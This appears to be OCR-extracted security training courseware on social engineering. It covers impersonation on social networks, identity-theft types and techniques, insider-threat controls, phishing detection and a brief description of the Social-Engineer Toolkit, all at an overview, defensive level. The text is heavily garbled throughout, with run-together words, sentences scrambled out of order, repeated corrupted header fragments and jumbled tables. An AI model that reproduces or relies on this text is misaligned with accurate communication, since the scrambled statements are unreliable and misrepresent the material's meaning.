to collectsensitive information,
ical andCountermensores
Mackin ©by E-Comel
Copyright
ModuleFlow
Social Engineering
Concepts ai acaiai on
ImpersonationSocial
2 Social
Engineering
TechalquesThott Hdentity
3) tnsidertireste Countermeasures
on Social Networking
Impersonation Sites
Today socialnetworking sites are widelyusedbymanypeople that allowthemto buildonline
profiles,shareinformationandmediasuchas pictures, blogentries,and music clips.Thus, itis
relativelyeasier for an attacker someone. Thevictim is likely
to impersonate to trust the
attackerandeventually revealinformationthatwouldhelpthemgain access to the system.
Thissection describeshowattackersperform socialengineeringthrough impersonation using
various socialnetworking sites suchas Facebook,
Linkedin,andTwitter,and highlights the risks
thesesitespose to corporatenetworks.
ical andCountermensores
Mackin ©by E-Comel
Copyright
SocialEngineering
through on Social
Impersonation
Sites
Networking
ous uses confidential
gather intormation
fe
thee fraudulent
‘nxaclarsuse profiles
toces bre
networksofrend nd extracti normatonung sol
dette ratnceringtectrques
ovpanuaton
Professional
Deas
purtalondonpinyBoorton
toons sore
esonatbetas
‘therforms
ofsel otc
engineering
SocialEngineering
through on SocialNetworking
Impersonation Sites
Associalnetworking
sites suchas Facebook,
Twitter,
and Linkedinare widely
used,
attackers
Thereare two waysan attackercan perform
cooptthem as a vehiclefor impersonation.
on socialnetworking
Impersonation sites:
By a fictitiousprofile
creating of the victim on thesocialmediasite
By stealing
thevictim'spassword
or indirectly
gainingaccess to thevictim'ssocialmedia
account
Socialnetworking sites are a treasure trove for attackersbecause peoplesharetheir personal
and professional information o n thesesites,suchas name, address, mobilenumber, dateof
birth,projectdetails,jobdesignation, company name, and location.The more information
people shareo n a socialnetworking site,the more likelyitis that an attacker
can impersonate
themto launchattacksagainst them,their associates, They
or their organization. mayalsotry
to join the target organization's employee groupsto extract corporate data
general,
In the information gather
attackers fromsocialnetworking
sites includes
organization
details,
professionaldetails, and personal
contacts and connections, details,whichtheythen
Useto execute otherforms
ofsocial
engineeringattacks.
ical andCountermensores
Mackin ©by E-Comel
Copyright
on Facebook
Impersonation
on Facebook
Impersonation
Source:https://www.facebook.com
Facebookis a well-knownsocialnetworking
site that connects people.
It is widely
used
betweenfriendswhosharecomments andupload links,
photos, and videos.To impersonate
userson Facebook,
fakeaccountsandtryto add“Friends―
information.
or
attackersuse nicknamesaliases insteadof their real names. They
profiles
to view others’
create
andobtaincriticalandvaluable
Users
join the groupandprovide
employment backgrounds,
theircredentialssuchas dateof birth,educationaland
or spouses’
names
Using
thedetailsof any one of the employees, an attackerc an compromise a secured
facility
to gainaccessto thebuilding
Attackerscreate a fakeaccount and scan the detailson the profilepagesof various targetso n
socialnetworking sitessuchas LinkedinandTwitter to engagei n spear phishing,
impersonation,
and
identity
theft
ical andCountermensores
Mackin ©by E-Comel
Copyright
=DUN
SocialNetworking
Threatsto Networks
Corporate
ny BD eaitcaton
et content
Involuntary
DataLeakage MalwarePropagation
‘Targeted
Attacks Damage Reputat
to Business
Vulnerability, and
‘Network Infrastructure
Coste
Maintenance
Spam
and Loss
Phishing of Productivity
SocialNetworking
Threats to Corporate
Networks
Beforesharing
dataon a socialnetworking
site, or enhancing
their channels,
groups, or profiles,
usersshould
privateandcorporate beaware ofthefollowing
socialor technical
securityrisks:
Data sites are huge
Theft:Socialnetworking databases by many people
accessed
worldwide,
Involuntary
the
increasingriskof informationexploitation.
Data Leakage:
In the absenceof a strongpolicythat sets clear lines
betweenpersonal and corporate content,employeesmayunknowingly postsensitive
dataabouttheir companyon socialnetworking sites,whichmighthelpan attackerto
launchan attackon the targetorganization
Targeted
Attacks:Attackersuse the informationposted
on socialnetworking
sites to
launch targetedattackso n specific
usersor companies.
NetworkVulnerability: All socialnetworking to flawsandbugs
sitesare subject suchas
loginissues and Java vulnerabilities,
whichattackerscouldexploit. Thiscould,
i n turn,
leadto the leakage of confidential
information relatedto the targetorganization’s
network.
and Phishing:
‘Spam Employeesusingwork e-mailIDs o n socialnetworking
sites will
probably receive spam and become targetsof phishing attacks,
which could
the organization's
‘compromise network.
Modification
of Content:In the absenceof proper securitymeasures and effortsto
preserveidentity, channels,
blogs, groups,profiles,
andother platformscan be spoofed
ical andCountermensores
Mackin ©by E-Comel
Copyright
‘Malware
Propagation: sites are idealplatforms
Socialnetworking for attackersto
spread viruses, bots,worms, trojans,spyware,andothermalware.
Business Reputation: Attackerscan falsifyinformationabout an organization or an
employee on socialnetworking sites,resulting
in lossof reputation,
Infrastructureand MaintenanceCosts:Using socialnetworking sites entailsadded
infrastructure
and maintenance resources for organizations
to ensure that their
defensivelayers
are effectivesafeguards.
Loss of Productivity:
Organizationsmust monitor employees’network activities to
maintain
security do
andensure that suchactivities not misusethesystemandcompany
ical andCountermensores
Mackin ©by E-Comel
Copyright
ModuleFlow
Concepts
Social Engineering
Sites
Networking
2
Social
Engineering
Techniques
Tdontity
Thott
3) tnsidertireste Countermeasures
Identity
Theft
CEH
thefts a rime i n which an
\@ Identity yourpersonally
steals identifiableinformation
security
imposter suchas
name,creditcard number, socal or driver's
lcensenumbers,
et. t o commitfraudor other
“a:
rttackerscan
seces facies
use
ofa and employeestarget
identitytheftto impersonate organizationphysically
Identity
Theft
‘Types
of
ical
Mackin
and Copyright
©
by Countermensores E-Comel
Theft (Cont'd)
Identity
‘Common
Techniques
Use
fo
Identity
Theft
‘Personal
Attackers
Informationfor
Obtain
Indicationsof identity
Theft
of Pretent
Tra walescomputer
apts, callphones
ee "6 Unf hago your ca cae
Hacking
=
=
(compromising
ssineing ‘Mal
Theftn d Rerouting ——
IdentityTheft
theft is a problem
Identity that manyconsumers facetoday. In theUnitedStates, some state
legislators
have imposed employees
lawsrestricting from providingtheir SSNs (Social
Security
Numbers)
during
their Identity
theft
frequently
figures
recruitment.
shouldbe informedabout identity
initiatives.
in news reports.
theft so that theydo not endanger
Companies
their own anti-fraud
typesof identity
identitytheft, including
This section discusses theft,common techniques
attackersuse to obtain personalinformationfor identity
theft,and various indicationsof
identity
‘The
theft
IdentityTheftand Assumption Deterrence Act of 1998definesidentity
theft as the illegal
Use of someone's
identifiable
identification.
Identity
theft occurs whensomeone stealsothers’
informationfor fraudulentpurposes. Attackersillegally
informationto commit fraudor othercriminalacts.
obtainpersonally
personally
identifying
of personally
‘Types identifiable stolenbyidentity
information thieves:
Name +
Bankaccount number
+
+
office
address Credit
Homeand
Socialsecurity
number
*
+
cardinformation
Creditreport
Phonenumber
Date
birthof
Driving license
number
Passport
number
ical andCountermensores
Mackin ©by E-Comel
Copyright
attackerstealspeople’s
‘The identity
forfraudulent
purposessuchas:
=
‘=
To opennew
credit
Toopen a new phone
cardaccountsin the nameo f the user withoutpayingthe
account i n theuser'sname, or to run up charges
or wireless on
bills
theirexistingaccount
informationto obtainutilityservicessuchaselectricity,
To use thevictims’ heating,
or
cable
TV
To open bankaccountswiththeintention
information of
writing checks
bogus usingthevictim's
ical andCountermensores
Mackin ©by E-Comel
Copyright
Criminal
Identity Theft
Thisis one of the most common and most damaging typesof identity
theft. A criminal
uses someone's identity to escape criminalcharges. Whentheyare caught or arrested,
theyprovide the assumedidentity. The bestway to protectagainstcriminalidentity
theft is to keepall personal informationsecure, whichincludesfollowing safeInternet
practices andbeing cautiousof “shoulder
surfers.―
FinancialIdentity
Theft
This type of identitytheft occurs when a victim's bank account or credit card
is stolenandillegally
information usedbya thief.They
c an max out a creditcardand
withdraw money from the account,or can use the stolen identity to open a new
account,apply fornew creditcards,andtakeout loans. Theinformation that is required
to hackinto thevictim'saccount andstealtheir informationis obtainedthrough viruses,
phishingattacks,or databreaches.
Driver'sLicenseIdentityTheft
This
type
losetheir driver'slicense,
the perpetrator
as alittle
of identitytheft is the easiest it requires
or it can easily
sophistication.A personcan
be stolen.Once it falls into the wronghands,
can sellthe stolendriver'slicenseor misuse it bycommitting traffic
violations, of whichthe victim is unaware of andfails to pay finesfor,ending up with
their licensesuspended or revoked.
InsuranceIdentity
Theft
Insurance identity relatedto medicalidentity
theft is closely theft. It takesplace
whena
perpetrator unlawfullytakesthe victim's medicalinformation to accesstheir insurance
for medicaltreatment. Its effectsincludedifficultiesi n settling medicalbills,higher
andprobable
insurance premiums, troublei n acquiringfuturemedical
coverage.
MedicalIdentityTheft
Thisis the most dangerous typeof identity theft wherethe perpetrator
uses thevictim's
name or information withoutthe victim’s consent or knowledgeto obtainmedical
products and claim health insurance or healthcareservices. Medical identity theft
resultsi n frequent erroneous entries i n the victim's
medical whichcouldleadto
records,
falsediagnoses andlife-threateningdecisions bythedoctors.
TaxIdentity
Theft
Thistypeof identity theft occurs whenthe perpetratorstealsthe victim’s
SocialSecurity
Numberto file fraudulent tax returns and obtain fraudulenttax refunds.It creates
their legitimate
difficultiesfor the victim i n accessing tax refundsandresultsi n a lossof
funds.Phishing emailsare one ofthe main tricksusedbythe criminalto steala target's
information.Therefore, protectionfromsuchidentitytheft includesthe adoption of safe
Internetpractices,
ical andCountermensores
Mackin ©by E-Comel
Copyright
Identity
Cloning
andConcealment
This type of identitytheft encompasses all forms of identitytheft, where the
perpetratorsattemptto impersonate someone else simplyi n order to hide thelr
identity. couldbe illegal
Theseperpetrators thosehiding
immigrants, fromcreditors,or
simply thosewho
Synthetic
Identity
Theft
want
to become “anonymous.―
of
Theft wallets,
personal
laptops,
computers,
information
cell phones,
backup
media,
andother sources of
Physical
theft is common. Attackerssteal hardwarefrom places
suchas hotelsand
recreationalplacessuchas clubs,restaurants, Givenadequate
and beaches.
parks, time,
theycan recover valuabledatafromthesesources
Internet Searches
Attackerscan gather a considerablea mount of sensitive informationvia legitimate
Internetsites,usingsearchenginessuchas Google,Bing,andYahoo.
SocialEngineering
Socialengineering is the art of manipulating
people
into performingcertain actions or
divulgingpersonal information andaccomplishing
their task without usingcracking
methods.
Dumpster
Diving Surfing
andShoulder
rummagethrough
‘Attackers householdgarbageandthetrashbinsof organizations,
ATM
centers,hotels,and other places
to obtain personaland financialinformationfor
fraudulentpurposes.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Criminals byglancing
may find user information observing
at documents, personal
identificationnumbers(PINs)
typedinto automatic teller machines(ATM),
or by
‘overhearing
conversations.
Phishing
may pretend
The “fraudster― to be froma financialinstitution or otherreputable
and send spamor pop-upmessages
organization to trick users into revealing
their
personal
information.
Skimming
‘Skimming
refersto stealing debitcardnumbersbyusingspecial
creditor devices
storage
calledskimmers
or wedges
whenprocessingthecard.
Pretexting
Fraudsters may impersonate executives from financialinstitutions, telephone
companies,andotherbusinesses. Theyrelyon “smooth-talking―
andwin the trust of an
individual
to reveal
sensitive information.
Pharming
Pharming, alsoknownas domainspoofing, is an advanced formof phishingi n whichthe
attackerredirectsthe connection betweenthe IP addressand its targetserver. The
attackermayuse cachepoisoning(modifying the Internet addressto that of a rogue
address)to do so, Whenthe users typein the Internet address,it redirects themto 2
roguewebsitethat resemblesthe original.
Hacking
(compromising system)
a user's
‘Attackers
may compromise user systems androuter informationusing listening
devices
and scanners.They
suchas sniffers gain accessto an abundance of data,decryptit (if
necessary),
anduse it for identity
theft.
Keyloggers
and Password (Malware)
Stealers
‘An
attackermayinfectthe user’s computerwith trojans,viruses, or othermalwareand
then recordandcollectthe user’s keystrokes
to stealpasswords, usernames,andother
sensitive informationof personal,financial,
or business import.
may alsouse emailsto sendfakeforms,
‘Attackers suchas InternalRevenue Service(IRS)
forms, to gather
Wardriving
information
fromtheir
victims.
‘Attackers
search
for unsecuredWi-Fi wirelessnetworksi n movingvehicles
containing
laptops,
smartphones, Oncetheyfind unsecurednetworks,
or PDAs. theyaccess any
sensitive informationstored
on thedevices
of theuserson thosenetworks.
Theft
‘Mail andRerouting
Often,mailboxescontain bank documents(creditcards or account statements),
administrativeforms,and other importantcorrespondence. Criminalsuse this
informationto obtaincreditcardinformationor to reroute the mailto a new address.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Indications of Identity
Theft
People
do not realizethat theyare the victim of identity
theft until theyexperience some
unknownand unauthorizedissuesas a result of the theft.Therefore, it is of paramount
that people
importance watch out for the warningsignsthat their identities have been
Listedbeloware some ofthesignsofidentity
compromised, theft:
=
Unfamiliarchargesto yourcreditcardthat youdo not recognize.
=
Nolonger
receive creditcard,
bank,
or utility
statements
Creditors callaskingaboutan unknownaccount o n yourname.
=
Thereare numerous trafficviolationsunderyourname thatyou didnot commit.
=
Youreceive charges
formedicaltreatment or services you never received.
Thereis more thanone tax return filedunderyour name.
Beingdeniedaccess to your own account and unableto take out loansor use other
services.
Not receivingelectricity,
gas,water,or otherservices billsdueto stolenmail
Suddenchanges
from,
in
your personal
medicalrecordsshowing
a conditionyou do
not suffer
additional
‘Some of identity
indications theftare as follow:
Getting a notificationthat your informationwas compromised
or misusedbya data
a
inexplicable
‘An
an
breachin companywhereyou are an employee
cashwithdrawal
or have
fromyour bankaccount,
account.
ical andCountermensores
Mackin ©by E-Comel
Copyright
ModuleFlow
2 Social
Engineering
TechniquesThott Hdentity
3) taidermascate
(©) Comes
Countermeasures
Socialengineersexploit humanbehavior(such as manners, enthusiasm towardwork,laziness,
or naivete)to gain access to the targeted company's informationresources. Socialengineering
attacksare difficultto guard
deceived.They
against,as the victim might
or
not be aware thathe shehasbeen
a re very muchlike the other kindsof attacksusedto extract a company’s
valuabledata.Toguard againstsocialengineeringattacks, a companyneedsto evaluate the risk
of different kinds of attacks, estimate possible lossesand spread a wareness among its
employees.
can implement
Thissection dealswithcountermeasuresthatan organization to bemore secure
socialengineering attacks.
against
ical andCountermensores
Mackin ©by E-Comel
Copyright
SocialEngineering
Countermeasures
Train
Individuals
on
secur pices
Presence
ofincldence
response authentiation
proper time Implement
two-factor
fare isroglariyupdated
SocialEngineering
Countermeasures
Attackers socialengineeringtechniques
implement to trickpeople
into revealing
organizations’
confidentialinformation.They to perform
use socialengineering fraud,identity
theft,industrial
espionage,and other disreputable To guard
behaviors. againstsocialengineeringattacks,
organizations must developeffectivepolicies
and procedures;however, merelydeveloping
themis not enough.
ical andCountermensores
Mackin ©by E-Comel
Copyright
To betruly
effective, should:
an organization
=
policies
Disseminate amongemployees
and provide
proper educationand training.
Specialized
trainingbenefits employees
i n higher-tisk
positionsagainstsocial
engineeringthreats.
Obtainemployee signatures
on a statement acknowledging
that theyunderstandthe
organization's
policies.
=
Define ofpolicy
violations,
the consequences
The main objectivesof socialengineeringdefensestrategies
are to create user awareness,
robustinternalnetworkcontrols, policies,
and security plans,
andprocesses.
Officialsecuritypolicies helpemployees
and procedures or users makethe rightsecurity
They
decisions.
Password
should
include
the safeguards:
Policies
following
Change regularly.
passwords
© Avoid passwords that are easyto guess.It is possibleto guesspasswords from
answersto socialengineering questionssuchas, “Where
were you born?―"Whatis
or "Whatis your pet's
your favoritemovie?― name?"
Blockuser accountsif a user exceedsa certain numberof failedattemptsto guessa
password.
Chooselong(minimumof 6 8 characters)
-
and complex
(using
various
alphanumeric
andspecial
characters)
passwords.
© passwords
Donot disclose to anyone.
Password policies
Security oftenincludeadviceon properpassword for
management,
example:
Avoid sharing
a computer
account.
Avoidusingthesame password
fordifferentaccounts.
Avoid storingpasswords
on mediaor writingthem down on a notepad
or sticky
note.
Avoid communicating
over
passwordsthe phone
or through
ical andCountermensores
Mackin ©by E-Comel
Copyright
Officesecurity
or personnel
must escort visitors to designated
visitor rooms or
lounges.
areas of an organization
Restrict access to certain to preventunauthorizedusers
fromcompromising the security
of sensitive data,
Disposeof old documentsthat contain valuableinformationbyusing equipment
suchas paper shredders andburnbins. Thispreventsinformation gathering by
attackersusing techniques
suchas dumpster diving.
Employ
securitypersonnel to protect people
i n an organization and property —
supplement
trained securitypersonnel
with alarmsystems, surveillancecameras,
and
other
equipment.
Defense Strategy
© SocialEngineering
Campaign: shouldconductn umerous social
An organization
engineering exercises using different techniqueso n a diversegroup of peoplein
orderto examine howits employees mightreact to realsocialengineeringattacks.
GapAnalysis:Using theinformationobtainedfromthe socialengineeringcampaign,
a gap analysisevaluatesthe organization basedon industry-leading practices,
threats,
‘emerging andmitigation strategies.
RemediationStrategies:Depending upon the result of the evaluationin the gap
analysis,
organizations develop a detailed remediationplanto mitigate the
or the loopholes
‘weaknesses found in the earlierstep.The planfocusesmainly on
educating
and creatingawareness amongemployees basedon their roles and
identifying
andmitigatingpotential
threatsto theorganization,
additionalcountermeasures against
‘Some socialengineeringare as follows:
=
Train Individualson Security Policies:An efficient trainingprogram consistsof basic
socialengineeringconcepts and techniques, all securitypolicies,
and methodsto
increase awareness of socialengineering.
Implement
Proper Thereshouldbe administrator,
AccessPrivileges: user, and guest
levelsofauthorization,
accountswith respective
Presence of a Proper IncidenceResponse Time:Thereshouldbe properguidelines for
to a socialengineering
reacting attempt.
Availability
of Resources Only to Authorized
Users:Makesure sensitive information
is
securedandthat resources are onlyaccessedbyauthorizedusers
ScrutinizeInformation: Categorize
the informationas top secret,proprietary,
for
andforpublic
internalu se only, use,or use othercategories.
Performa Background
Checkand ProperTerminationProcess:Insiderswith a criminal
background employees
andterminated for procuringinformation.
are easytargets
Anti-VirusandAnti-Phishing
Defenses: Usemultiple layers of anti-virus defenses
at
end-userandmailgateway
levelsto minimize socialengineering attacks.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Implement Two-FactorAuthentication: Insteadof fixedpasswords,use two-factor
authenticationfor high-risk
network services suchas VPNsand modempools. In the
two-factor (TFA)
authentication approach, theuser must present
two different
formsof
proofof identity. then theyneedto
If an attackeris tryingto breakinto a user account,
breakboth
in-depth forms
user multifactor
difficult
of identity,whichis more
authentication
mechanism
security and partof the
piecesof evidencethat a user provides
to do.Hence,
couldincludea physical
TA is a defense-
family.Thetwo
tokensuchas a card,
and is typically
something the personcan rememberwithout mucheffort, suchas a
securitycode,PIN,or password.
‘Adopt
Documented Change Management: A documented change-management process
is more secure thanthe ad-hocprocess.
Ensure aRegular Update of Software:Organizations shouldensure that the system
and
softwareare regularly
patched andupdated as the attackersexploitunpatched andout-
of-datesoftwareto obtainusefulinformationto launchan attack.
ical andCountermensores
Mackin ©by E-Comel
Copyright
InsiderThreats
Detecting
1 data
risk
presents
another
InsiderR isk
‘Controle secrty
professional
Insider ayerof compen
or whch eques
be | ofcontain ad
iT
hesecuntyframeworkmust commended
safeguards, actionsbytheemploye
profesional,eparation dts, aesiringoiler ete
Controls
ata
sect prtesonals
os Prevention,
anus too suchasDLP(Symantec
te) andAM (SiPointerty
DataLossPrevention,
Secret
ASASec Suiteete) to deterier tests
analyze
profesionalmust
‘Secu ee a varity ofscurty controlsa ndtol t o and
d etectn ie
05/1PS be
etc), Event
uch as
os Pont Sofware
(Check
Sytem, logManagem (solarvinds
iv NextGen
cogthythm
de, 18 MSecu Network
Scart
Pltform,te] may sed
S IEM
Manager,
nruson Prevention
te), andSIEM(ESI
Splunk
InsiderThreats
Detecting
Most data attackscome from insiders, whichonlymakesthem more difficult to preventor
detect. Insidersare mostly
of
aware the security
to thwartandmayincur huge
are difficult
loopholes
themto stealconfidentialinformation.It is essentialto carefully
financial
andthey
oftheorganization, exploit
handleinsiderthreatsas they
lossesand businessinterruptions.Someof
themethodsto detectinsiderthreatsare givenbelow:
InsiderRiskControls
Insiderdata risk presentsanother layer of complexityfor securityprofessionals.
It
requiresdesigning infrastructurein sucha way that user permissions,
security access
anduser actionsare monitoredefficiently.
controls,
DeterrenceControls
Theorganization's securityframeworkmust contain safeguards,
followrecommended
actions of the employee andIT professionals,
provide of duties,
a separation andassign
privileges. Thesesecuritycontrolseliminate or minimize the securityrisks to the
organization's criticalassets.
professionals
Thedeterrencecontrolsthat the security must have i n place
to deter
insider threats are DLP (DataLoss Prevention)
tools, and Identityand Access
Management
(IAM)
tools.
ical andCountermensores
Mackin ©by E-Comel
Copyright
of thedeterrencecontrolsare:
‘Some
DLP
*
Tools:
DataLossPrevention(https://www.symantec.com)
Symantec
© DataLossPrevention(https://securetrust.com)
SecureTrust
* PointDataLossPrevention(https://www.checkpoint.com)
Check
©. IAM
Tools:(hetps://www.sailpoint.com)
#
IdentitylQ
SailPoint
*
*
Suite
(https://www.rsa.com)
RSASecurlD
Core
Access
Assurance
Suite
(https://www.coresecurity.com)
DetectionControls
Security
professionals controlsandtools to analyze
must use a varietyof security and
detect
insider
threats organizations.
in
professionals
The detectioncontrolsthat the security must have in place
to detect
insider threats are IDS/IPS detection and preventionsystems),
(Intrusion log
management andSecurity
systems, InformationandEventManagement (SIEM)
tools,
Some controls
are:
of the detection
Tools
IDS/IPS
©.
*
(https://www.checkpoint.com)
Check PointIPSSoftwareBlade
* IBM Security (https://www.ibm.com)
NetworkIntrusionPreventionSystem
+ AlienVaultUnifiedSecurity
Management (https://www.
alienvault.com)
Tools
LogManagement
* SolarWinds
Security (https://www.solarwinds.com)
Event Manager
+
(https://www.splunk.com)
Splunk
*
(https://www.loggly.com)
Logely
SIEM
Tools
ArcSight ESM(hetps://www.microfocus.com)
*
LogRhythm (https://logrhythm.com)
NextGenSIEMPlatform
# SolarWinds
Log& Event Manager(https://www.solarwinds.com)
ical andCountermensores
Mackin ©by E-Comel
Copyright
InsiderThreatsCountermeasures
BDeos pritenes
Controleaccess
Upton
ting
{Employee
en
eter
secaity
background
veifeation
andsing
Uogsng Pero onament
Employee
monitoring Privileged
users monitoring
Legal
polices Credentials
deactivation
credential
fr terminated
Insider ThreatsCountermeasures
Thereare safety
measures that help
an organization
to prevent
or minimize insiderthreats:
+
Separation androtationof duties:Divideresponsibilities
amongmultiple employeesto
restrict the amount of poweror influenceheldbyany individual.Thishelps
to avoid
fraud,abuse,
and conflictof interest and facilitatesthe detectionof controlfailures
{including
bypassing theft).
securitycontrolsand information Rotationof duties at
randomintervalshelps to deterfraudor the abuseof privileges.
an organization
Leastprivileges:
Provideusers with onlyenough access privilege
to allow them to
performtheir assigned
tasks.Thishelpsmaintain informationsecurity.
Controlled access: Accesscontrols i n various parts of an organizationrestrict
unauthorizedusersfromgainingaccessto criticalassetsandresources.
Loggingand auditing:Performlogging andauditing periodically
to check
formisuseof
company resources.
Employee monitoring:Use employee softwarethat recordsall user
monitoring sessions,
professionals.
andthat can bereviewedbysecurity
Legalpolicies:
Enforce legalpolicies
to preventemployees
from misusing the
organizations resourcesandsensitive datatheft.
Archivecriticaldata:Maintaina recordofthe organization’
criticaldatai n the formof
archivesto beusedas backup resources,if needed,
Employee trainingon cybersecurity: o n how to protecttheir
Train employees
credentialsand the company’s
confidentialdata from attack.Theywill be able to
identify
socialengineeringattemptsandtakepropermitigationsandreportingsteps.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Employeebackground verification:Ensure thorough backgroundchecksof all
before hiring
‘employees them byusing Google searchandsocialnetworking
sites and
consulting
previous
employers.
Periodicrisk assessment: Performa periodic
risk assessmenton critical assets to
identify
vulnerabilitiesand implement againstboth insiderand
protectionstrategies
outsiderthreats.
Privilegedusers monitoring: Implement additionalmonitoringmechanisms for system
administratorsand privileged users as theseaccountscan be used to can deploy
malicious
bomb
codeor logic on the systemor network,
Credentialsdeactivationfor terminatedemployees: Disableall the employee's
access
profiles locations,
to the physical networks,systems,applications,anddataimmediately
after termination.
Periodicrisk assessments:Performperiodic risk assessmentson all the organization's
criticalassetsthen develop
and maintain a risk management strategyto secure those
assetsfrombothinsidersandoutsiders.
Layered Implement
defense: multiple
layers
of defenseto preventand protectcritical
assetsfromremote attacksoriginated
frominsiders.Develop
appropriate
remote access
policiesandproceduresto thwartsuchattacks.
Physical Builda professional
security: team that monitors the physical
security security
ofthe organization.
Surveillance:Install video cameras to monitor all critical assets. Install and enable
screen-capturingsoftware o n allcriticalservers,
ical andCountermensores
Mackin ©by E-Comel
Copyright
TheftCountermeasures
Identity
your
Ensure
wilt
name snot i n marketers
present Protec
publeed your
personalinformation
fombeing
fevew
store
your ert cardstatement
secure, outofreachofothers
regularyand Donot
rumbers or
Spay
unless
shareanyaccoue/contact
mandatary
wear Montor
enline
banking cts regularly
seepyourmatstaeyenpvngtemaitox
BY Newer Itanypavo eter on ce
Theft Countermeasures
Identity
Identity
theft occurs whensomeone usespersonal information(suchas a name, socialsecurity
number, dateofbirth,
mother’s
maiden way, name, or address)
without the person's
card or loan services, or even rentalsand mortgages,
permission.
i n 2 malicious such
knowledgeor
asforcredit
ical andCountermensores
Mackin ©by E-Comel
Copyright
‘=
toolssuchas a firewallandanti-virus on yourpersonal
Installhostsecurity computer
Someadditionalcountermeasures against theft are as follows:
identity
=
Tokeep
mail
secure,
asking
requests mailbox
emptyyour
forpersonal
quickly
information
anddo not reply
to unsolicited
email
Shredcreditcardoffersand“convenience
checks―
that are not useful
Donot store any financialinformationon the system anduse strongpasswords
for all
financial
accounts,
Checktelephone andcellphone billsforcallsyou didnot make,
KeepyourSocialSecurity card,passport, license,andothervaluablepersonal
informationhiddenandsecured.
Readwebsiteprivacypolicies.
Becautious beforeclicking
on a link provided
in an emailor instant message.
ical andCountermensores
Mackin ©by E-Comel
Copyright
How to DetectPhishing
Emails?
BB) to peso
reas
yourbook
berm ited emai abe
BB)or
ors ofrzeney vaste
mates
My contneranmatalpeng
How to DetectPhishing
Emails?
Todetectphishing emails,
first,hoveryour mouse pointerover the name i n the “From―
column
Doing
then it couldbe a phishing
displayit’s
the
so will showwhether original domainname is linkedto the sender's
email.For example,
domainas “gmail.com.―
“From―
name; ifitis not,
an emailfrom Gmail.comshouldprobably
Check to see if the emailprovides a URLandprompts the user to clickon it. If so, ensure that
the link is legitimate byhovering the mouse pointerover it (todisplay the link’s URL) and
ensure it usesencryption (https://).
To beon thesafeside,always opena new windowandvisit
the
site
Do not
bytypingit i n directly
provide
insteadof clicking
on
the
link provided
website,
any informationto the suspicious
i n theemail
as it will ikely
link directly
to the
attacker.
fewotherindicatorsof phishing
‘A emails:
=
Itseems to befroma bank,company,or socialnetworking
site andhasa generic
greeting
It seemsto be froma personlistedi n youremailaddressbook
Ithas a n urgenttone or makesa velledthreat
tt may contain grammaticalor spellingmistakes
It includes
linksto spoofed
websites
It maycontain offersthatseemto betoo good
to be true
It includesofficial-looking
logosandotherinformationtakenfromlegitimate
websites
it may contain @malicious
attachment
ical andCountermensores
Mackin ©by E-Comel
Copyright
915: an
Figure
Email
withof
Screens
ot Showing IndicationsPhishing
ical andCountermensores
Mackin ©by E-Comel
Copyright
Toolbar
Anti-Phishing
sean
|S
ging
ena met 8
Page
Malicious
‘Suspected
Toolbar
Anti-Phishing
+
Netcraft
Source:https://toolbar.netcraft:com
The Netcraftanti-phishing community is a giant neighborhood
watch scheme,
the most alert and most expertmembersto defendeveryonewithin the
‘empowering
community
againstphishing attacks.TheNetcraftToolbarprovides
updatedinformation
about sites that users visit regularly
andblocksdangerous sites.Thetoolbarprovides
a
wealthof informationabout popular websites.Thisinformationwill helpto makean
informedchoiceaboutthe integrity of thosesites.
shown in the screenshot,
‘As Netcraft protectsindividualsand organizations
from
phishing
attacksandfraudsters.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Malicious
Suspected Page
This pagehasbeen blocked
by the Netcraft
Figure9.16:
Screenshot
ofNetraft
Modul
9 127
Page tical andCountermensores
Making by Comet
Copyright©
PhishTank
Source:https://phishtank.com
PhishTank clearinghouse
is a collaborative for dataand informationabout phishing
on
the Internet.It provides
an open API fordevelopers
andresearchers
to integrate
anti:
data
phishing
into their applications.
showni n the screenshot,
‘As securityprofessionals
can use PhishTank
to checkwhether
maliciousURLis a phishing
‘a
not.
site or
PayPal»
Redesigned
withyou in mind.
Figure9.17:
Screenshot
ofPhishTank
ical andCountermensores
Mackin ©by E-Comel
Copyright
CommonSocialEngineering and DefenseStrategies
Targets
CommonSocialEngineering andDefenseStrategies
Targets
Attackersimplement
various socialengineering techniques
to trick people
into providing
sensitive information thushelping
abouttheirorganizations, attackers
to launchmalicious
activities. Thesetechniques
are usedon privileged
individualsor thosewhodealwith important
information.
Belowtableshowscommon socialengineeringtargets,various socialengineeringtechniques
thatattackersuse, andthe defensestrategies
to counter theseattacks.
Engineering AttackTechniques
Social Defense
Strategies
Targets
Front
office | and
help
desk
staff
Eavesdropping,
Train employees
surfing,never to revealpasswords
shoulder or other
desk
and
|policies
help intimidation persuasion,and_ information
impersonation,
for office
over thephone.
the front
personnel
Enforce
andhelp desk
|
Technicalsupport Impersonation, persuasion,
Traintechnical
phone system
support
administrators
never
executivesand
to reveal
administrators or
and system intimidation,fakeSMS,
calls,
andemails passwords otherinformation over the
phoneor email
ical andCountermensores
Mackin ©by E-Comel
Copyright
Shouldersurfing, Implement
employee
training,best
office andchecklists
practices, for using
Vendors of the
‘eavesdropping,
and ingratiation
all
passwords.
persuasion,and Educatevendors
Impersonation,
Escort guests
aboutsocial
targetorganization intimidation engineering.
Mall room
mails
or forging
Theft,damage, of
Lockthe andmonitor
employees
mailroom,train
Company's
FakeSMS, phone calls,and Train executivesnever to reveal identity,
emailsdesigned to grab passwords, or other confidential
Executives
confidentialdata informationover the phone or email
Keep monitored
alltrashi n secured,
Dumpsters diving
Dumpster areas;shredimportant
data;and erase
media
magnetic
Table 93:
Common engineering
social a nddefense
targets strategies
ical andCountermensores
Mackin ©by E-Comel
Copyright
J
SocialEngineering
Tools:SocialEngineering
Toolkit (SET) CEH
1GT heSociaLEngineer
Took(ST) an opensourcePython-diven
tool
testingaround
aimedat penetration
engineering
social a Seep
romewertisen
ephin
SocialEngineering
Tools
+
SocialEngineering
Toolkit(SET)
Source:https://www.trustedsec.com
The Social-Engineer
Toolkit (SET) is an open-sourcePython-driven tool aimed at
testingvia socialengineering.It is a genericexploitdesigned
penetration to perform
advancedattacksagainst humanelementsto compromise andmake themoffer
a target
sensitive information.SETcategorizes attackssuchas email,web,and USBattacks
according to the attack vector used to trick humans.The toolkit attackshuman
weakness, exploiting fearful,
the trusting, greedy, andthe helpful
nature of humans.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Somesocial
of
SET
showing
